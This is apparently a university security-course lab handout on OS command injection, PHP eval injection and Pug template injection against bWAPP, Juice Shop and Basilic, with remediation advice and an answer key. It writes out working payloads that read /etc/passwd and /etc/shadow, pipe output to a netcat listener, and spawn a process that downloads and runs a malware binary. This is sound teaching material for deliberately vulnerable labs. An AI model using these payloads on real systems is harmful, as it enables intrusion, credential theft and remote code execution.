OS Injections

Lecture Notes

This lecture will present an overview over OS specific injections.

Download here

Practical tasks


OS Command Injection

This lab will address Injection vulnerabilities and in particular OS Command Injection vulnerabilities. Take notes of your actions as you execute the lab, including the barriers found and how you overcame them.

Head for the bWAPP virtual machine, login and select the OS Command Injection exercises. You will be presented with a dialog asking for a address. The purpose is to issue a nslookup with that address. You can expect that the application will execute the nslookup command, plus the text provided by the user. The different security levels will add additional checks and limit the characters that can be used.

For reference you can follow the code in Sonarcloud.

A basic payload would be ; id, which effectively results in nslookup ; id and will execute two commands.

The security levels will imply the following limitations:

  • low: no checks
  • medium: & and ; are not allowed.
  • high: uses the PHP function escapeshellcmd . Following characters are preceded by a backslash: &#;`|*?~<>^()[]{}$\, \x0A\xFF. ' and " are escaped only if they are not paired.


  • Use a payload and show the content of the /etc/shadow file.
  • Try other commands. If you wish to test writes to the filesystem, use /tmp.
  • Increase the security level to MEDIUM and repeat the attack

Follow to the OS Command Injection - Blind. Blind command injection occurs when the system call that’s being made does not return the response of the call to the Document Object Model. Means when the command output is not displayed to us in the webpage, now how can we get to know that there is OS command injection when there is no output shown?

Try with an IP address of your choice and see what happens. Maybe you can try the IP address you have inside the VPN. Now start Wireshark and check if you receive a packet.

An attack will not present the result directly, but it may produce a result that is available on the machine or is sent remotely. Can you think about a payload to do this? As a hint consider the use of netcat, which can send any content to a remote server. You may need a simple web server in your host. python3 -m http.server may help.


  • Evaluate what can be done with the input field
  • Devise a payload that runs a command and send the output to your server
  • Increase the security level and repeat the attack
  • Enumerate the server folders

PHP Code Injection

The objective of these exercises is similar to the previous, but instead of injecting commands that will run on the bash, there will be a vulnerability which allows injecting PHP code. You can explore the code in the Sonarcloud instance, which is correctly identified as vulnerable. The issue in this case is the use of the eval keyword. Please check the documentation of this function, in particular, the warning that is presented there.

In this exercise, the page will accept one argument named message with a text. The text is evaluated inside PHP without the proper checks (excluding the fact that eval should not be used).

This exercise will only execute on the LOW security level.


  • Create a payload that can be injected in this argument. As harmless functions check phpinfo() or echo.

OS Command Injection

For these tasks either install the software of access the Multi App VM in the laboratory.

Juice Shop

Juice Shop is vulnerable to injection attacks, through a specific technique called Server Side Template Injection. These attacks are possible as webpages are composed by dynamic values added to a static template. The template contains HTML, which is modified dynamically with data specific to each request. If an attacker can control what data is added, it can exfiltrate information from a server, or even execute commands remotely.

With SSTI, once the threat actors identify the template engine, they can also gain further control of the server by using the remote code execution exploit. The untrusted users can identify the objects, methods and properties. Such exposure can further lead to information disclosure about application passwords, application programming interface keys and more.

Therefore, an SSTI vulnerability targeting the template engines and allowing untrusted users to edit templates introduces an array of serious risks. It is important for developers to take remediation steps that depend upon the different template engines in place.

To execute an SSTI attack against Juice shop, follow these instructions:

  • Perform the totally obvious Google search for juicy malware to find https://github.com/J12934/juicy-malware

  • Your goal is to use RCE to make the server download and execute the malware version for the server OS, so on Linux you might want to run something like wget -O malware https://github.com/J12934/juicy-malware/blob/master/juicy_malware_linux_64?raw=true && chmod +x malware && ./malware

  • You probably realized by now that /profile is not an Angular page? This page is written using Pug which happens to be a Template engine and therefore perfectly suited for SSTI mischief.

  • Set your Username to 1+1 and click Set Username. Your username will be just shown as 1+1 under the profile picture.

  • Trying template injection into Pug set Username to #{1+1} and click Set Username. Your username will now be shown as 2 under the profile picture! In reality the content of your username was executed in the server. An addition is armless, but other code can be executed.

  • Craft a payload that will abuse the lack of encapsulation of JavaScript’s global.process object to dynamically load a library that will allow you to spawn a process on the server that will then download and execute the malware.

  • The payload might look like #{global.process.mainModule.require('child_process').exec('wget -O malware https://github.com/J12934/juicy-malware/blob/master/juicy_malware_linux_64?raw=true && chmod +x malware && ./malware')}. Submit this as Username and (on a Linux server) the challenge should be marked as solved

  • As you are able to execute this command, you can also execute other commands. In fact, you are including Javascript, and then spawning a full blown command execution.

How to Remediate SSTI

The following remediation steps are abstract and can be applied to any template engine.


Templates should not be created from user-controlled input. User input should be passed to the template using template parameters. Sanitize the input before passing it into the templates by removing unwanted and risky characters before parsing the data. This minimizes the vulnerabilities for any malicious probing of your templates.


If allowing certain risky characters is a business requirement to render certain attributes of a template, assume that malicious code execution is inevitable. Then, sandboxing the template environment in a docker container is probably a safer option. With this option, you can use docker security to craft a secure environment that limits any malicious activities.

With these things in mind, you’ll be able to look out for and remediate SSTI vulnerabilities while still taking advantage of what server-side templates have to offer.


Basilic is a bibliography server that is used for research labs. It helps in the automation and diffusion of the research publication on the internet. It also generates a web page from the publication database. This framework helps with indexing, searching and various other options.

Basilic requires PHP, Apache, and MySQL for the proper installation and configuration.

Searching for an exploit on the internet we will find CVE-2012-3399 which elaborates an improper input validation by Basilic on the following URL:


The exploit URL provides the vulnerable URL that leads to the Remote Code Execution (RCE). The exploit helps to determine that the diff.php file is vulnerable to input handling and it is present in the /Config. In particular, the application seems to be vulnerable to injection through the file argument.


  • Explore the vulnerability present in this software, by injecting an OS command.
  • Download Basilic from this url and analyze the content of the Config/diff.php file.
  • Explain why the vulnerability is present.


OS Command Injection

  • LOW: ; cat /etc/passwd
  • Medium: | cat /etc/passwd
  • High: The host runs Linux with PHP 5.5.9. Probably only CVE-2016-1904 and Bug 71039 are applicable.

OS Command Injection - Blind

  • The command field accepts IP addresses and other text, but nothing is presented. Commands can be executed with the same format as in the previous exercise. As an example, this will work | ping -c 3 10.105.0.XX

  • | cat /etc/passwd | nc 10.105.0.X 1337 and in your server use nc -l -p 1337

  • | cat /etc/passwd | nc 10.105.0.X 1337

  • | find / | nc -u 10.105.0.X 1337

  • Nothing known to be possible when the security level is HIGH, because the PHP version and OS versions do not have any known CVE.

PHP Code Injection

  • message=phpinfo()


  • file=|cat /etc/passwd&new=1&old=2